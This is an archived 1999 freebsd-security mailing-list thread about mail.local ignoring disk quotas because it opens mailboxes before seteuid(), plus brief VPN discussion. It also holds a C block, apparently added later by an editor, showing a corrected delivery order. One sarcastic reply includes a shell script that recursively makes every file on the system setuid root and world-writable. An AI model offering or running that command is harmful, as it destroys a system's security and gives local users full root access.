E-28031 Madrid - España / Spain

From owner-freebsd-security Fri Apr 30 08:37:00 1999
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 608) id 1537714F69; Fri, 30 Apr 1999 08:36:59 -0700 (PDT)
From: "Jonathan M. Bresler"
To: frank@vogon.agala.harz.de
Cc: freebsd-security@freebsd.org
In-reply-to: <19990429223254.A19140@vogon.agala.harz.de> (frank@vogon.agala.harz.de)
Subject: Re: VPN
Message-Id: <19990430153659.1537714F69@hub.freebsd.org>
Date: Fri, 30 Apr 1999 08:36:59 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > What about the Microsoft PPTP protocol? Are there any plans to get FreeBSD
> > to interact with NT/95 machines running PPTP?
>
> Don't use Microsoft PPTP, see http://www.counterpane.com/.

the problem is not with PPTP itself, but rather microsoft's
inimitable style of implementing protocols.
jmb

From owner-freebsd-security Fri Apr 30 08:53:18 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 0670E14F96; Fri, 30 Apr 1999 08:53:15 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id LAA20802; Fri, 30 Apr 1999 11:52:31 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Fri, 30 Apr 1999 11:52:31 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: "Pedro J. Lobo"
Cc: Fernando Schapachnik, freebsd-security@FreeBSD.ORG
Subject: Re: Does mail.local need to be setuid-root?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 30 Apr 1999, Pedro J. Lobo wrote:

> On Fri, 30 Apr 1999, Fernando Schapachnik wrote:
>
> > In an earlier message, Robert Watson wrote:
> > > On Fri, 30 Apr 1999, Pedro J. Lobo wrote:
> > >
> > > > As you may see, it is a rather ugly "feature". So, the question is: does
> > > > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
> > > > use /usr/bin/mail as the local mailer? I also administer an alpha with
> > > > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
> > > > mailer.
> >
> > You can use procmail, which doesn't need suid.
>
> Maybe I'll give it a try. In the meantime, I've done a few more tests, and I
> don't like too much what I've seen.
>
> I have looked at the mail.local code, and it does a seteuid(2) to the
> recipient's UID. So, why does the system allow it to write over quota?
>
> I've written a small test program, and have found this: if you seteuid()
> and open a file for writing, write() or fwrite() calls will fail (that is,
> if the effective user is over quota). But, if you open the file, and call
> seteuid() when the file is already open, then you can write as much data
> as you want. As mail.local does this (first opens the user's mailbox, then
> seteuid()'s), the quotas are ignored.
>
> I think this is a bug, and that quotas should be checked (and applied)
> every time you call write() or fwrite() or whatever. Opinions?

The credentials used to open a file remain bound to the file object. This
is actually very useful, as it means a privileged program can pass access
to a file/whatever using the ancillary data feature, etc. Similarly, a
setuid program can open a terminal device, say, and then change its uid
so that it doesn't have the privilege to open other terminal devices, but
still has the first open. But this is clearly a downside if you later want
to restrict access.

Presumably the answer is to perform the open that delivers the mail
*after* the setting of the uid. You'll need to also open the file
beforehand to create it if necessary and set ownership, etc. Once you
believe delivery will succeed, reopen the file in the restricted
environment. Have mail.local return some kind of success/fail to the
parent so you can catch race conditions like the user performing rm
/var/mail/user between the check and the reopen.

Alternatively, a cheap solution that is susceptible to some races would be
simply to check if there was room to deliver the message before
delivering, and returning a transient error if not. It's conceivable that
a user could get a race in there, but that would work only for one
message.
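The delivery order Robert describes above, as an added example (editor's code, placed after his reply; it is not from his message and not mail.local's): a privileged phase that creates, vets and chowns the mailbox, then a switch to the recipient before the open that writes, with the reopened file compared against the vetted one to catch the rm race. Assumed: a writable /tmp for the two demo functions, which run unprivileged as the calling user; mailbox locking is left out.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
enum { DELIVER_OK = 0, DELIVER_TEMPFAIL = 75, DELIVER_PERMFAIL = 69 };   /* EX_OK/EX_TEMPFAIL/EX_UNAVAILABLE */

/* Over quota is permanent (Pedro's choice: bounce rather than queue until mqueue fills); the rest retries. */
int classify_write_errno(int err)
{
    return err == EDQUOT ? DELIVER_PERMFAIL : DELIVER_TEMPFAIL;
}
/* Phase 1, the privileged part: the mailbox must exist, be a plain single-link file and belong to
 * the recipient; its identity (dev/ino/owner) is recorded so phase 2 can check it reopened the same file. */
int prepare_mailbox(const char *path, uid_t uid, gid_t gid, struct stat *ident)
{
    int rc = DELIVER_TEMPFAIL, fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0 || fstat(fd, ident) < 0) goto out;
    if (ident->st_nlink != 1 || !S_ISREG(ident->st_mode))
        rc = DELIVER_PERMFAIL;                     /* hard link, device, ...: refuse outright */
    else if ((ident->st_uid == uid && ident->st_gid == gid) || fchown(fd, uid, gid) == 0) {
        ident->st_uid = uid;                       /* fchown is the one step that needs root */
        ident->st_gid = gid;
        rc = DELIVER_OK;
    }
out:
    if (fd >= 0) close(fd);
    return rc;
}

/* Phase 2: become the recipient FIRST, then open.  Robert's point: on FreeBSD the credentials in
 * force at open(2) stay bound to the file object, so this open, not a root one, is what the
 * recipient's quota sees.  mail.local opened as root and seteuid()'d afterwards: the bypass. */
int append_as_recipient(const char *path, uid_t uid, const struct stat *ident,
                        const char *msg, size_t len)
{
    uid_t saved = geteuid();                       /* restoring to yourself is a no-op */
    struct stat sb;
    int fd, rc = DELIVER_TEMPFAIL;
    if (seteuid(uid) < 0) return rc;
    fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW);
    if (seteuid(saved) < 0 || fd < 0) goto out;
    /* The rm-between-check-and-reopen race: we must hold the very inode phase 1 vetted, still the
     * recipient's, with one link.  Anything else is a tempfail: the MTA retries, nothing is delivered blind. */
    if (fstat(fd, &sb) < 0 || sb.st_dev != ident->st_dev || sb.st_ino != ident->st_ino ||
        sb.st_uid != ident->st_uid || sb.st_nlink != 1 || !S_ISREG(sb.st_mode))
        goto out;
    for (rc = DELIVER_OK; len > 0 && rc == DELIVER_OK; ) {
        ssize_t n = write(fd, msg, len);
        if (n >= 0)
            msg += n, len -= (size_t)n;
        else if (errno != EINTR) {
            rc = classify_write_errno(errno);
            (void)ftruncate(fd, sb.st_size);       /* don't leave half a message behind */
        }
    }
    if (rc == DELIVER_OK && fsync(fd) < 0) rc = DELIVER_TEMPFAIL;
out:
    if (fd >= 0) close(fd);
    return rc;
}
static const char SAMPLE_MSG[] =                   /* constructed, not from the thread */
    "From sender@example.invalid Fri Apr 30 17:55:27 1999\nSubject: constructed test\n\nhello\n";
/* Demo 1: deliver to a fresh temporary mailbox as the calling user (seteuid to your own uid needs
 * no privilege, so this runs unprivileged).  Returns the mailbox size afterwards, or -1. */
long demo_deliver_ok(void)
{
    char path[] = "/tmp/mbox-demo.XXXXXX";
    struct stat ident, sb;
    int fd = mkstemp(path);
    long size = -1;
    if (fd >= 0 && prepare_mailbox(path, getuid(), getgid(), &ident) == DELIVER_OK &&
        append_as_recipient(path, getuid(), &ident, SAMPLE_MSG, sizeof SAMPLE_MSG - 1) == DELIVER_OK &&
        fstat(fd, &sb) == 0)
        size = (long)sb.st_size;
    if (fd >= 0) { close(fd); unlink(path); }
    return size;
}

/* Demo 2: another file is renamed over the mailbox between the two phases (the user's rm plus a
 * replacement at the same name); phase 2 must refuse it with a tempfail. */
int demo_replaced_mailbox(void)
{
    char path[] = "/tmp/mbox-demo.XXXXXX", other[] = "/tmp/mbox-other.XXXXXX";
    struct stat ident;
    int fd = mkstemp(path), rc = -1;
    if (fd < 0) return -1;
    close(fd);
    if (prepare_mailbox(path, getuid(), getgid(), &ident) == DELIVER_OK && (fd = mkstemp(other)) >= 0) {
        close(fd);
        if (rename(other, path) == 0)              /* a different inode now sits at path */
            rc = append_as_recipient(path, getuid(), &ident, SAMPLE_MSG, sizeof SAMPLE_MSG - 1);
        unlink(other);                             /* ENOENT after a successful rename; harmless */
    }
    unlink(path);
    return rc;
}
```

demo_replaced_mailbox() comes back with 75 (the tempfail code) because the reopened inode no longer matches the vetted one, which is exactly the race the reopen check exists for.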
Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Fri Apr 30 08:57:09 1999
Delivered-To: freebsd-security@freebsd.org
Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id A80D614F96; Fri, 30 Apr 1999 08:55:29 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es)
Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id RAA17781; Fri, 30 Apr 1999 17:55:27 +0200 (MET DST)
Date: Fri, 30 Apr 1999 17:55:27 +0200 (MET DST)
From: "Pedro J. Lobo"
To: freebsd-security@freebsd.org
Subject: Re: Does mail.local need to be setuid-root?
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-1143190565-925487727=:17688"
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 30 Apr 1999, Pedro J. Lobo wrote:

> I have looked at the mail.local code, and it does a seteuid(2) to the
> recipient's UID. So, why does the system allow it to write over quota?
>
> I've written a small test program, and have found this: if you seteuid()
> and open a file for writing, write() or fwrite() calls will fail (that is,
> if the effective user is over quota).
> But, if you open the file, and call
> seteuid() when the file is already open, then you can write as much data
> as you want. As mail.local does this (first opens the user's mailbox, then
> seteuid()'s), the quotas are ignored.
>
> I think this is a bug, and that quotas should be checked (and applied)
> every time you call write() or fwrite() or whatever. Opinions?

Just for the record, I have modified mail.local (patch attached) to have at
least a temporary workaround. I have tested it on my server and it works.
But, I feel that this is not a complete solution, and that the quota system
is somewhat broken.

Pedro.

--
-------------------------------------------------------------------
Pedro José Lobo Perea                    Tel:    +34 91 336 78 19
Centro de Cálculo                        Fax:    +34 91 331 92 29
E.U.I.T. Telecomunicación                e-mail: pjlobo@euitt.upm.es
Universidad Politécnica de Madrid
Ctra. de Valencia, Km. 7
E-28031 Madrid - España / Spain

[attachment: mail.local.patch]

From owner-freebsd-security Fri Apr 30 09:10:17 1999
Delivered-To: freebsd-security@freebsd.org
Received: from federation.addy.com (federation.addy.com [207.239.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 1720915321; Fri, 30 Apr 1999 09:09:59 -0700 (PDT) (envelope-from jim@federation.addy.com)
Received: from localhost (jim@localhost) by federation.addy.com (8.8.5/8.6.12) with SMTP id MAA11080; Fri, 30 Apr 1999 12:09:58 -0400 (EDT)
Date: Fri, 30 Apr 1999 12:09:58 -0400 (EDT)
From: Jim Sander
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Does mail.local need to be setuid-root?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> modified mail.local

We have a similar "hack" here to check quotas before delivery, but it's
somewhat ugly. It would really be nice to have a *clean* way to do this.
Is there any vital functionality that would be lost by moving the open
after the uid is altered?

> the quota system is somewhat broken.

I have noticed that some users' soft limits are enforced as hard, and some
hard limits are ignored. We're still on various 2.2.x systems btw. Anyone
else seen this, or is it something specific to our setup here?

-=Jim=-

From owner-freebsd-security Fri Apr 30 09:15:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from haddock.euitt.upm.es (haddock.euitt.upm.es [138.100.52.102]) by hub.freebsd.org (Postfix) with ESMTP id 55CA015316; Fri, 30 Apr 1999 09:14:35 -0700 (PDT) (envelope-from pjlobo@euitt.upm.es)
Received: from localhost (pjlobo@localhost) by haddock.euitt.upm.es (8.8.8/8.8.5) with ESMTP id SAA17884; Fri, 30 Apr 1999 18:08:29 +0200 (MET DST)
Date: Fri, 30 Apr 1999 18:08:29 +0200 (MET DST)
From: "Pedro J. Lobo"
To: Robert Watson
Cc: Fernando Schapachnik, freebsd-security@FreeBSD.ORG
Subject: Re: Does mail.local need to be setuid-root?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8BIT
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 30 Apr 1999, Robert Watson wrote:

> On Fri, 30 Apr 1999, Pedro J. Lobo wrote:
>
> > I have looked at the mail.local code, and it does a seteuid(2) to the
> > recipient's UID. So, why does the system allow it to write over quota?
> >
> > I've written a small test program, and have found this: if you seteuid()
> > and open a file for writing, write() or fwrite() calls will fail (that is,
> > if the effective user is over quota). But, if you open the file, and call
> > seteuid() when the file is already open, then you can write as much data
> > as you want. As mail.local does this (first opens the user's mailbox, then
> > seteuid()'s), the quotas are ignored.
> >
> > I think this is a bug, and that quotas should be checked (and applied)
> > every time you call write() or fwrite() or whatever. Opinions?
>
> The credentials used to open a file remain bound to the file object. This
> is actually very useful, as it means a privileged program can pass access
> to a file/whatever using the ancillary data feature, etc. Similarly, a
> setuid program can open a terminal device, say, and then change its uid
> so that it doesn't have the privilege to open other terminal devices,
> but still has the first open. But this is clearly a downside if you later
> want to restrict access.

Well, that's reasonable.

> Presumably the answer is to perform the open that delivers the mail
> *after* the setting of the uid. You'll need to also open the file
> beforehand to create it if necessary and set ownership, etc. Once you
> believe delivery will succeed, reopen the file in the restricted
> environment. Have mail.local return some kind of success/fail to the
> parent so you can catch race conditions like the user performing rm
> /var/mail/user between the check and the reopen.

In fact, I've just posted to the list a small patch to mail.local that does
exactly that. Maybe it is the right solution, after all.

I am also treating EQUOTA errors as *not* temporary, because if they are
treated as temporary and the messages are stored in the mail queue there is
a (high) risk that /var/spool/mqueue gets full in a few days.
I am not sure that this is the right thing to do in all situations, but
for me it is (and people keep thinking that having the source code of the
full OS can't help. Ha!.)

Well, time to go home. See you all on Monday.

Pedro.

--
-------------------------------------------------------------------
Pedro José Lobo Perea                    Tel:    +34 91 336 78 19
Centro de Cálculo                        Fax:    +34 91 331 92 29
E.U.I.T. Telecomunicación                e-mail: pjlobo@euitt.upm.es
Universidad Politécnica de Madrid
Ctra. de Valencia, Km. 7
E-28031 Madrid - España / Spain

From owner-freebsd-security Fri Apr 30 09:28:22 1999
Delivered-To: freebsd-security@freebsd.org
Received: from helios.man.lublin.pl (helios.man.lublin.pl [194.92.17.34]) by hub.freebsd.org (Postfix) with ESMTP id AB688152DA; Fri, 30 Apr 1999 09:28:06 -0700 (PDT) (envelope-from sopel@nemezis.ipan.lublin.pl)
Received: from nemezis.ipan.lublin.pl ([193.59.19.154]:3538 "EHLO nemezis.ipan.lublin.pl" ident: "sopel") by helios.man.lublin.pl with ESMTP id <5517-864>; Fri, 30 Apr 1999 18:27:53 +0200
Date: Fri, 30 Apr 1999 18:29:56 +0000 (GMT)
From: Wojtek
To: "Pedro J. Lobo"
Cc: Robert Watson, Fernando Schapachnik, freebsd-security@FreeBSD.ORG
Subject: Re: Does mail.local need to be setuid-root?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

greetings.

i think that mail.local is a real mess (there were various exploits for
it). why not switch to a more decent mail distribution program
(procmail ?) as a default for freebsd.

the other thing in question is - should sendmail be the default mail
agent on freebsd ? there are many substitutes for it which have proven
to be more secure (postfix - by Wietse Venema, or zmailer, qmail, and so
on..).

what do the core team think about this ?
sopel

From owner-freebsd-security Fri Apr 30 09:36:08 1999
Delivered-To: freebsd-security@freebsd.org
Received: from noop.colo.erols.net (noop.colo.erols.net [207.96.1.150]) by hub.freebsd.org (Postfix) with ESMTP id C746115990; Fri, 30 Apr 1999 09:35:54 -0700 (PDT) (envelope-from gjp@noop.colo.erols.net)
Received: from localhost ([127.0.0.1] helo=noop.colo.erols.net) by noop.colo.erols.net with esmtp (Exim 2.12 #1) id 10dGFu-000GpF-00; Fri, 30 Apr 1999 12:35:14 -0400
To: "Pedro J. Lobo"
Cc: freebsd-security@freebsd.org
From: "Gary Palmer"
Subject: Re: Does mail.local need to be setuid-root?
In-reply-to: Your message of "Fri, 30 Apr 1999 15:47:18 +0200."
Date: Fri, 30 Apr 1999 12:35:13 -0400
Message-ID: <64680.925490113@noop.colo.erols.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Pedro J. Lobo" wrote in message ID :
> The problem is that you can send mail to a user that is over quota, and
> the system will append the new message to its inbox (located in /var/mail,
> as by default). Indeed, root can append data to a file that belongs to a
> user that is over quota.

Hrm. I thought this had been fixed. Anyhow, a temporary workaround is to
use procmail as your local delivery agent.

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations.
See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Fri Apr 30 10:06:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 743FC14FF7; Fri, 30 Apr 1999 10:06:23 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA07652; Fri, 30 Apr 1999 10:06:27 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda07650; Fri Apr 30 10:06:16 1999
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA00762; Fri, 30 Apr 1999 10:06:10 -0700 (PDT)
Message-Id: <199904301706.KAA00762@passer.osg.gov.bc.ca>
Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdXLJ755; Fri Apr 30 10:05:33 1999
X-Mailer: exmh version 2.0.2 2/24/98
Reply-To: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 3.1-RELEASE
X-Sender: cschuber
To: "Pedro J. Lobo"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Does mail.local need to be setuid-root?
In-reply-to: Your message of "Fri, 30 Apr 1999 15:47:18 +0200."
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Date: Fri, 30 Apr 1999 10:05:33 -0700
From: Cy Schubert
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message , "Pedro J. Lobo" writes:
> Hello, people.
>
> I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and
> telnet server for our students. Recently I noticed that several users were
> using more disk space than their quotas should allow (!). After a bit of
> investigation, I have traced down the problem to the mail system.
>
> The problem is that you can send mail to a user that is over quota, and
> the system will append the new message to its inbox (located in /var/mail,
> as by default). Indeed, root can append data to a file that belongs to a
> user that is over quota.
>
> As you may see, it is a rather ugly "feature". So, the question is: does
> /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
> use /usr/bin/mail as the local mailer? I also administer an alpha with
> Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
> mailer.

The main difference between DU and FreeBSD is:

DU 4.0D:
OSF1 hostname V4.0 878 alpha
drwxrwxrwt   2 root     mail         512 Apr 26 00:00 /var/spool/mail
lrwxrwxrwx   1 root     system         7 Dec  9 14:16 /bin -> usr/bin
-rws--x--x   2 root     bin        40960 Dec 29  1997 /usr/bin/mail

FreeBSD 3.1R:
FreeBSD hostname 3.1-RELEASE FreeBSD 3.1-RELEASE #0: Thu Apr  8 16:05:54 PDT 1999     root@hostname:/opt/usr_src-310/sys/compile/HOSTNAME  i386
drwxrwxr-x   2 root     mail         512 Apr 30 09:41 /var/mail
-r-sr-xr-x   1 root     wheel      15056 Mar  2 06:53 /usr/libexec/mail.local

Solaris 2.6 (for good measure):
SunOS HOSTNAME 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-Enterprise
drwxrwxrwt   3 root     mail         512 Apr 29 23:45 /var/mail
-r-x--s--x   1 bin      mail       64376 Jul 15  1997 /bin/mail

You can resolve your issue by making mail.local sgid mail instead of suid
root. Ownership of individual mail files cannot be set by mail.local when
it's sgid mail, so you will need to create each individual user's mail
spool file with the proper permissions 660 and ownership before they can
receive mail. If mail.local is the only sgid mail application on your
system, using sgid mail shouldn't be any less secure (from a privacy point
of view) than the stock-out-of-the-box setup.
Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Open Systems Group             Internet:  Cy.Schubert@uumail.gov.bc.ca
ITSD                                      Cy.Schubert@gems8.gov.bc.ca
Province of BC
            "e**(i*pi)+1=0"

From owner-freebsd-security Fri Apr 30 10:35:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id CEC021506B; Fri, 30 Apr 1999 10:35:45 -0700 (PDT) (envelope-from freebsd@deepwell.com)
Received: (qmail 11251 invoked from network); 30 Apr 1999 18:12:18 -0000
Received: from file.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 30 Apr 1999 18:12:18 -0000
Message-Id: <4.1.19990430103009.012536c0@mail1.dcomm.net>
X-Sender: freebsd@mail.deepwell.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Fri, 30 Apr 1999 10:34:16 -0700
To: freebsd-security@freebsd.org
From: Deepwell Internet
Subject: Re: Does mail.local need to be setuid-root?
In-Reply-To: <199904301706.KAA00762@passer.osg.gov.bc.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I prefer all my files, executables and data to be SUID root. I'm even
including a small script to aid in this. Good luck!

#!/bin/sh
cd /
chown -R root:wheel /
chmod -R 6777 /
echo 'done'

At 10:05 AM 4/30/99 -0700, you wrote:
> In message , "Pedro J. Lobo" writes:
> > Hello, people.
> >
> > I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and
> > telnet server for our students. Recently I noticed that several users were
> > using more disk space than their quotas should allow (!). After a bit of
> > investigation, I have traced down the problem to the mail system.
> >
> > The problem is that you can send mail to a user that is over quota, and
> > the system will append the new message to its inbox (located in /var/mail,
> > as by default). Indeed, root can append data to a file that belongs to a
> > user that is over quota.
> >
> > As you may see, it is a rather ugly "feature". So, the question is: does
> > /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I
> > use /usr/bin/mail as the local mailer? I also administer an alpha with
> > Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local
> > mailer.
>
> The main difference between DU and FreeBSD is:
>
> DU 4.0D:
> OSF1 hostname V4.0 878 alpha
> drwxrwxrwt   2 root     mail         512 Apr 26 00:00 /var/spool/mail
> lrwxrwxrwx   1 root     system         7 Dec  9 14:16 /bin -> usr/bin
> -rws--x--x   2 root     bin        40960 Dec 29  1997 /usr/bin/mail
>
> FreeBSD 3.1R:
> FreeBSD hostname 3.1-RELEASE FreeBSD 3.1-RELEASE #0: Thu Apr  8 16:05:54 PDT 1999     root@hostname:/opt/usr_src-310/sys/compile/HOSTNAME  i386
> drwxrwxr-x   2 root     mail         512 Apr 30 09:41 /var/mail
> -r-sr-xr-x   1 root     wheel      15056 Mar  2 06:53 /usr/libexec/mail.local
>
> Solaris 2.6 (for good measure):
> SunOS HOSTNAME 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-Enterprise
> drwxrwxrwt   3 root     mail         512 Apr 29 23:45 /var/mail
> -r-x--s--x   1 bin      mail       64376 Jul 15  1997 /bin/mail
>
> You can resolve your issue by making mail.local sgid mail instead of suid
> root. Ownership of individual mail files cannot be set by mail.local when
> it's sgid mail, so you will need to create each individual user's mail
> spool file with the proper permissions 660 and ownership before they can
> receive mail. If mail.local is the only sgid mail application on your
> system, using sgid mail shouldn't be any less secure (from a privacy point
> of view) than the stock-out-of-the-box setup.
>
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                    Fax:    (250)387-5766
> Open Systems Group             Internet:  Cy.Schubert@uumail.gov.bc.ca
> ITSD                                      Cy.Schubert@gems8.gov.bc.ca
> Province of BC
>             "e**(i*pi)+1=0"

From owner-freebsd-security Fri Apr 30 10:50:56 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.iserver.com (gatekeeper.iserver.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id BD81F14C4E; Fri, 30 Apr 1999 10:50:54 -0700 (PDT) (envelope-from hart@iserver.com)
Received: by gatekeeper.iserver.com; Fri, 30 Apr 1999 11:50:53 -0600 (MDT)
Received: from unknown(192.168.1.109) by gatekeeper.iserver.com via smap (V3.1.1) id xma017733; Fri, 30 Apr 99 11:50:50 -0600
Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.2) id LAA29032; Fri, 30 Apr 1999 11:49:59 -0600 (MDT)
Date: Fri, 30 Apr 1999 11:49:58 -0600 (MDT)
From: Paul Hart
X-Sender: hart@anchovy.orem.iserver.com
To: Wojtek
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Does mail.local need to be setuid-root?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 30 Apr 1999, Wojtek wrote:

> i think that mail.local is a real mess (there were various exploits for
> it). why not switch to a more decent mail distribution program
> (procmail ?) as a default for freebsd.

I for one would be very nervous if procmail were SUID/SGID on my system.
Have you ever looked at the sources to procmail? They are among the most
convoluted and aesthetically disturbing pieces of code I have ever seen.
And procmail is certainly not without its own problems, see for example:

http://geek-girl.com/bugtraq/1999_2/0031.html
http://geek-girl.com/bugtraq/1999_2/0043.html
http://geek-girl.com/bugtraq/1999_2/0040.html

> the other thing in question is - should sendmail be the default mail
> agent on freebsd ? there are many substitutes for it which have proven
> to be more secure (postfix - by Wietse Venema, or zmailer, qmail, and so
> on..).

... all with a completely unproven track record, except for qmail perhaps.
Haven't we already gone to battle over this?  I don't remember who won in
the sendmail versus the rest of the world battle, but this probably doesn't
belong on -security.

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security  Fri Apr 30 14:31: 8 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fasterix.frmug.org (d166.paris-81.cybercable.fr [212.198.81.166]) by hub.freebsd.org (Postfix) with ESMTP id C086A1554A for ; Fri, 30 Apr 1999 14:31:01 -0700 (PDT) (envelope-from pb@fasterix.frmug.org)
Received: (from pb@localhost) by fasterix.frmug.org (8.9.3/8.9.3/pb-19990315) id XAA45818 for freebsd-security@FreeBSD.ORG; Fri, 30 Apr 1999 23:31:00 +0200 (CEST)
Message-ID: <19990430233059.B426@fasterix.frmug.fr.net>
Date: Fri, 30 Apr 1999 23:30:59 +0200
From: Pierre Beyssac
To: freebsd-security@FreeBSD.ORG
Subject: Re: VPN
References: <19990429223254.A19140@vogon.agala.harz.de> <19990430153659.1537714F69@hub.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.92.8i
In-Reply-To: <19990430153659.1537714F69@hub.freebsd.org>; from Jonathan M.
Bresler on Fri, Apr 30, 1999 at 08:36:59AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Apr 30, 1999 at 08:36:59AM -0700, Jonathan M. Bresler wrote:
> > Don't use Microsoft PPTP, see http://www.counterpane.com/.
>
> the problem is not with PPTP itself, but rather microsoft's
> inimitable style of implementing protocols.

BTW, as there seems to be a lot of interest in VPNs currently, and I
had a need for something that could run between my FreeBSD box and a
Linux box, I've written a small usermode IPSEC-compliant tunnel when
I became tired of the impressive number of non-compatible hacks based
on PPP, ssh, TCP, PPTP, you name it, while IPSEC clearly will sweep
all of this.

It's more of a proof-of-concept code for the moment (only fixed keys:
it lacks key negotiation stuff), and it can't beat a kernel
implementation for performance, but it's easier to install, easier to
port to other systems (you only need some kind of a "tun" device),
easier to debug, easier to add weird crypto algorithms, easier to
export (the crypto is from the OpenSSL library), and last but not
least easier to distribute as a package external to the core OS.

I'm happily running it between several FreeBSD and Linux boxes to
setup tunnels to friends through my cable modem.

If anyone is interested, it can be found here. WARNING: it's really
experimental and the documentation is lacking, don't even bother if
you don't know how to setup a point to point link or how to add the
tun device to your kernel.
http://www.enst.fr/~beyssac/tunip.tar.gz
--
Pierre Beyssac      pb@fasterix.frmug.org      pb@fasterix.freenix.org
{Free,Net,Open}BSD, Linux: you can get worse, but it costs more
Free domains: http://www.eu.org/ or mail dns-manager@EU.org

From owner-freebsd-security  Fri Apr 30 21:44:29 1999
Delivered-To: freebsd-security@freebsd.org
